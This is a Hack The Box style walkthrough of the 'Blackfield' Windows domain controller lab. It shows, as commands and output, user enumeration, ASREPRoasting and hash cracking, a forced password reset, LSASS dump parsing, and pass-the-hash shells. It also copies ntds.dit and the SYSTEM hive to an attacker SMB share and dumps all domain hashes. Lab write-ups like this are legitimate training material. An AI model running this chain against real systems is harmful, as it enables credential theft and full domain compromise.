Blackfield
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.192 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.93 scan initiated Wed Apr 5 09:35:24 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up (0.099s latency).
Not shown: 65525 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
3268/tcp open globalcatLDAP
5985/tcp open wsman
49676/tcp open unknown
# Nmap done at Wed Apr 5 09:36:17 2023 -- 1 IP address (1 host up) scanned in 53.23 secondsNow that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p53,88,135,139,389,445,593,3268,5985,49676 10.10.10.192 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.93 scan initiated Wed Apr 5 09:36:40 2023 as: nmap -sCV -p53,88,135,139,389,445,593,3268,5985,49676 -Pn -n -oN targeted 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up (0.067s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-05 15:36:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp filtered netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49676/tcp filtered unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-04-05T15:36:56
|_ start_date: N/A
|_clock-skew: 8h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 5 09:37:32 2023 -- 1 IP address (1 host up) scanned in 51.93 secondsPort 53 is open, so we can enumerate all the possible subdomains for the blackfield.local domain name with dig.
dig any blackfield.local @10.10.10.192
; <<>> DiG 9.18.11-2-Debian <<>> any blackfield.local @10.10.10.192
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 53091
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 3
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;blackfield.local. IN ANY
;; ANSWER SECTION:
blackfield.local. 600 IN A 10.10.10.192
blackfield.local. 3600 IN NS dc01.blackfield.local.
blackfield.local. 3600 IN SOA dc01.blackfield.local. hostmaster.blackfield.local. 165 900 600 86400 3600
blackfield.local. 600 IN AAAA dead:beef::59ff:6dfe:cd4c:21f9
;; ADDITIONAL SECTION:
dc01.blackfield.local. 3600 IN A 10.10.10.192
dc01.blackfield.local. 3600 IN AAAA dead:beef::59ff:6dfe:cd4c:21f9
;; Query time: 36 msec
;; SERVER: 10.10.10.192#53(10.10.10.192) (TCP)
;; WHEN: Wed Apr 05 11:36:42 CEST 2023
;; MSG SIZE rcvd: 199Let's add all these subdomain names to the /etc/hosts file.
nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
f02::2 ip6-allrouters
10.10.10.192 blackfield.local dc01.blackfield.local hostmaster.blackfield.localLet' keep enumerating the domain controller. We can check if there is any interesting share hosted in the SMB server.
smbmap -H 10.10.10.192 -u 'guest'
[+] IP: 10.10.10.192:445 Name: blackfield.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
profiles$ READ ONLY
SYSVOL NO ACCESS Logon server shareIf we check the share, we'll see a bunch of directories called like possible users.
smbmap -H 10.10.10.192 -u 'guest' -r profiles$
[+] IP: 10.10.10.192:445 Name: blackfield.local
Disk Permissions Comment
---- ----------- -------
profiles$ READ ONLY
.\profiles$\*
dr--r--r-- 0 Wed Jun 3 18:47:12 2020 .
dr--r--r-- 0 Wed Jun 3 18:47:12 2020 ..
dr--r--r-- 0 Wed Jun 3 18:47:11 2020 AAlleni
dr--r--r-- 0 Wed Jun 3 18:47:11 2020 ABarteski
dr--r--r-- 0 Wed Jun 3 18:47:11 2020 ABekesz
...
dr--r--r-- 0 Wed Jun 3 18:47:12 2020 ZScozzari
dr--r--r-- 0 Wed Jun 3 18:47:12 2020 ZTimofeeff
dr--r--r-- 0 Wed Jun 3 18:47:12 2020 ZWausikExploitation
Let's put those usernames in the users file.
smbmap -H 10.10.10.192 -u 'guest' -r profiles$ | grep "dr--r--r--" | awk '{print $8}' > users
As the domain controller has the Kerberos service exposed, we can verify if any of these users is valid using kerbrute.
kerbrute_linux_amd64 userenum --dc 10.10.10.192 -d blackfield.local users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/05/23 - Ronnie Flathers @ropnop
2023/04/05 12:38:10 > Using KDC(s):
2023/04/05 12:38:10 > 10.10.10.192:88
2023/04/05 12:38:31 > [+] VALID USERNAME: audit2020@blackfield.local
2023/04/05 12:40:23 > [+] VALID USERNAME: support@blackfield.local
2023/04/05 12:40:28 > [+] VALID USERNAME: svc_backup@blackfield.local
2023/04/05 12:40:53 > Done! Tested 314 usernames (3 valid) in 162.879 secondsNow that we have a list of valid users, put them into a file, and let's try to do an ASREPRoast attack.
impacket-GetNPUsers blackfield.local/ -no-pass -usersfile valid_users
-no-passdon't ask for password.-usersfilefile which contains user per line.
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] User audit2020@BLACKFIELD.local doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.local@BLACKFIELD.LOCAL:ebd84a2b32ac125aa65fb405985c0a48$4861262f396e28b5d77218ffc4ae62e5e89315cbb26ea97fa75cab030ab186c5e0a1b3e6d9ee0526f3e46dbddd79dd252d77ef77daee5072b5d7bc8beaf5e709f710baae3d0a80fb9f17043f2b0f5b9134bcd27c6b379070ce9d8c7e59b7ac1e21837d2f58ecbb991ee6317ecaac8504b5cfd3ad8e43c6c158f44d855e00bafb2293b147cec5c1528ee3449ee8a4bf9bd7dcfc89e3b5871485cd9d1849a05fbf035c85e89a9921a0892f6d1f75c6c4a3e941ec7c6c792ec67cab1a4bae065e6ae17c7aa53320d66f718c8c0713c15a59710266e7b7b159d7919ebecdf54352f368e22c2e87caa611c929348a1518748cb9b323a3
[-] User svc_backup@BLACKFIELD.local doesn't have UF_DONT_REQUIRE_PREAUTH setWe get a hash of the support user. Let's try to break it with john.
john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight ($krb5asrep$23$support@BLACKFIELD.local@BLACKFIELD.LOCAL)
1g 0:00:00:10 DONE (2023-04-05 12:42) 0.09132g/s 1309Kp/s 1309Kc/s 1309KC/s #1ByNature..#*burberry#*1990
Use the "--show" option to display all of the cracked passwords reliably
Session completed.Let's use the credentials that we have to enumerate the domain controller more in depth with bloodhound-python.
bloodhound-python -c All -u 'support' -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer: DC01.BLACKFIELD.local
WARNING: Failed to get service ticket for DC01.BLACKFIELD.local, falling back to NTLM auth
CRITICAL: CCache file is not found. Skipping...
WARNING: DCE/RPC connection failed: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Done in 00M 10SNow, we have to start BloodHound. First, we have to start neo4j.
neo4j console
Then we will search for the localhost on port 4747 and log in with the username neo4j and password neo4j. Youâll have to change the password.
On a new console, run BloodHound.
bloodhound -nosandbox
Then log in with the credentials you set up earlier.
Then, click on the Upload Data button on the right section and select all the .json files generated with bloodhound-python.
Once all the .json files are uploaded, search for the user support@blackfield.local, and we'll see in the First Degree Object Control section that the support user has the privilege to change the password of the audit2020 user.
We can change the password of the audit2020 user as support using rpcclient.
rpcclient -N -U 'support%#00^BlackKnight' 10.10.10.192 -c "setuserinfo2 audit2020 23 alfa8sa123$"
Verify that the credentials are valid.
crackmapexec smb 10.10.10.192 -u 'audit2020' -p 'alfa8sa123$'
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:alfa8sa123$Now that we have valid credentials for the audit2020 user, let's see if we have access to any other share.
smbmap -H 10.10.10.192 -u 'audit2020' -p 'alfa8sa123$'
[+] IP: 10.10.10.192:445 Name: blackfield.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic READ ONLY Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server shareThere is one more interesting share in which we have read permissions. Let's mount the forensic share to our local system.
mount -t cifs //10.10.10.192/forensic /mnt/forensic/ -o "username=audit2020,password=alfa8sa123!$,domain=BLACKFIELD.local,rw"
Inside there is a directory called memory_analysis.
ls -l /mnt/forensic/
total 0
drwxr-xr-x 2 root root 0 Feb 23 2020 commands_output
drwxr-xr-x 2 root root 0 May 28 2020 memory_analysis
drwxr-xr-x 2 root root 0 Feb 23 2020 toolsThis directory has ZIP files. There is one called lsass.zip. If this file has the LSASS memory compressed in it, we could extract passwords and hashes from it.
ls -l /mnt/forensic/memory_analysis/
total 506000
-rwxr-xr-x 1 root root 37876530 May 28 2020 conhost.zip
-rwxr-xr-x 1 root root 24962333 May 28 2020 ctfmon.zip
-rwxr-xr-x 1 root root 23993305 May 28 2020 dfsrs.zip
-rwxr-xr-x 1 root root 18366396 May 28 2020 dllhost.zip
-rwxr-xr-x 1 root root 8810157 May 28 2020 ismserv.zip
-rwxr-xr-x 1 root root 41936098 May 28 2020 lsass.zip
-rwxr-xr-x 1 root root 64288607 May 28 2020 mmc.zip
-rwxr-xr-x 1 root root 13332174 May 28 2020 RuntimeBroker.zip
-rwxr-xr-x 1 root root 131983313 May 28 2020 ServerManager.zip
-rwxr-xr-x 1 root root 33141744 May 28 2020 sihost.zip
-rwxr-xr-x 1 root root 33756344 May 28 2020 smartscreen.zip
-rwxr-xr-x 1 root root 14408833 May 28 2020 svchost.zip
-rwxr-xr-x 1 root root 34631412 May 28 2020 taskhostw.zip
-rwxr-xr-x 1 root root 14255089 May 28 2020 winlogon.zip
-rwxr-xr-x 1 root root 4067425 May 28 2020 wlms.zip
-rwxr-xr-x 1 root root 18303252 May 28 2020 WmiPrvSE.zipTransfer it to our current directory, and decompress it.
cp /mnt/forensic/memory_analysis/lsass.zip .
unzip lsass.zip
Now we have the lsass.DMP file. Usually, the LSASS memory is dumped from the local Windows system using Mimikatz, but as we don't have access to the system we can use a tool called pypykatz.
pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
...
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef621
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
...Among other hashes, we get the NTLM hash of the svc_backup, which seems to be in the Remote Management Users because we can get a shell via WinRM. Then, we'll be able to grab the user flag.
evil-winrm -i 10.10.10.192 -u 'svc_backup' -H 9658d1d1dcd9250115e2205d9f48400d
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup
*Evil-WinRM* PS C:\Users\svc_backup\Documents> type \users\svc_backup\desktop\user.txt
3920bb317a0bef51027e2852be64b543Privilege Escalation
Indeed, the svc_backup user is a member of the Remote Management Users, but it is also a member of the Backup Operators group.
net user svc_backup
User name svc_backup
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2020 10:54:48 AM
Password expires Never
Password changeable 2/24/2020 10:54:48 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/5/2023 9:00:19 AM
Logon hours allowed All
Local Group Memberships *Backup Operators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.The idea is to copy the ntds.dit file to our system, so we can extract the NTLM hashes of all the domain users. We can follow the article Dumping Domain Password Hashes.First, set a simple SMB server on the current directory.
impacket-smbserver smbFolder $(pwd) -smb2support
Now, go the \windows\temp, create the directory privEsc, and get in there.
cd \windows\temp
mkdir privEsc
cd privEsc
Then, create a new file called diskshadow.txt and upload it to the victim machine. Make sure to add a blank space at the end of each line.
nano diskshadow.txt
upload /home/alfa8sa/HTB/machines/blackfield/diskshadow.txt
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z: Run the diskshadow tool together with the diskshadow.txt to create a new logical disk and create a copy of C:\ in it.
diskshadow.exe /s diskshadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 4/5/2023 12:35:51 PM
-> set context persistent nowriters
-> add volume c: alias someAlias
-> create
Alias someAlias for shadow ID {3abd85c1-910d-4b72-86cc-871254097018} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {4adb43d3-6632-4dd0-b257-0e6232d6d1d7} set as environment variable.
Querying all shadow copies with the shadow copy set ID {4adb43d3-6632-4dd0-b257-0e6232d6d1d7}
* Shadow copy ID = {3abd85c1-910d-4b72-86cc-871254097018} %someAlias%
- Shadow copy set: {4adb43d3-6632-4dd0-b257-0e6232d6d1d7} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 4/5/2023 12:35:52 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %someAlias% z:
-> %someAlias% = {3abd85c1-910d-4b72-86cc-871254097018}
The shadow copy was successfully exposed as z:\.
->Now, we should see the ntds.dit in the z: disk.
dir z:\windows\ntds
Directory: z:\windows\ntds
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/23/2023 2:34 PM 8192 edb.chk
-a---- 4/5/2023 12:35 PM 10485760 edb.log
-a---- 2/23/2020 9:41 AM 10485760 edb00004.log
-a---- 2/23/2020 9:41 AM 10485760 edb00005.log
-a---- 2/23/2020 3:13 AM 10485760 edbres00001.jrs
-a---- 2/23/2020 3:13 AM 10485760 edbres00002.jrs
-a---- 2/23/2020 9:41 AM 10485760 edbtmp.log
-a---- 4/5/2023 12:30 PM 18874368 ntds.dit
-a---- 4/5/2023 12:30 PM 16384 ntds.jfm
-a---- 4/5/2023 12:30 PM 434176 temp.edbLet's copy it to our local SMB server with robocopy.
robocopy /b z:\windows\ntds \10.10.14.5\smbFolder\ ntds.dit
We will also need a copy of HKLM\system.
reg save HKLM\system \10.10.14.5\smbFolder\system
Finally, we can extract the NTLM hashes with secretsdump.
impacket-secretsdump -system system -ntds ntds.dit LOCAL
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:2a2f8ac26db968c93a17fefdb36c38ee:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
...As we have the NTLM hash of the administrator user, we can get a shell. Then, all we have to do is reap the harvest and take the root flag.
evil-winrm -i 10.10.10.192 -u 'administrator' -H 184fb5e5178480be64824d4cd53b99ee
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt
4375a629c7c67c8e29db269060c955cbLast updated
Was this helpful?